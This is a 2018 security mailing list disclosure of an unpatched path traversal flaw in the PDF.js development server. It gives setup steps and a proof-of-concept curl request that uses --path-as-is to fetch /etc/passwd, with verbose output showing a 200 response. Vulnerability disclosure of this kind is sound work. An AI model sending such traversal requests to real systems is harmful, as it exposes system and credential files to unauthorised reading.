Date: Sat, 24 Nov 2018 13:16:49 +0530
From: Dhiraj Mishra <mishra.dhiraj95@...il.com>
To: oss-security@...ts.openwall.com
Subject: Path traversal in mozilla PDF.js [Unpatched]

## Summary
A path traversal issue was observed in Mozilla PDF.js which is a PDF reader
in JavaScript. This issue was observed while code review of PDF.js
(gulpfile.js)(
https://github.com/mozilla/pdf.js/blob/master/gulpfile.js#L1023), Mozilla
team says "The server with pdf.js is intended to be a development server
and should not be exposed to public networks. I suppose we could update the
docs to state that." and a upstream bug was filed against the same (
https://github.com/mozilla/pdf.js/issues/10249).

## Installation
PDF.js is built into version 19+ of firefox and a chrome extension is also
available on chrome web store. To install and get a local copy of PDF.js
here are the below steps :
$ git clone https://github.com/mozilla/pdf.js.git
$ cd pdf.js
$ npm install -g gulp-cli
$ npm install
$ gulp server

##Exploitation
I've used the attribute --path-as-is from cURL to verify this issue.
$ curl --path-as-is -v http://127.0.0.1:8888/../../../../../../etc/passwd
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
> GET /../../../../../../etc/passwd HTTP/1.1
> Host: 127.0.0.1:8888
> Accept: */*

< HTTP/1.1 200 OK
< Accept-Ranges: bytes